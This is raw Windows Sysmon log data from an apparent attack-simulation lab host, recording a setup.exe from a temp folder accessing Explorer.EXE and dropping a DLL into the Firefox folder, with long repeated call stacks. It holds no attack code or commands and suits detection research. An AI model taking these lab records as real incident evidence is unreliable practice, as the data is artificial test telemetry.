13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\AccessibleHandler.dll2021-01-18 13:59:52.083 10341000x800000000000000014100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
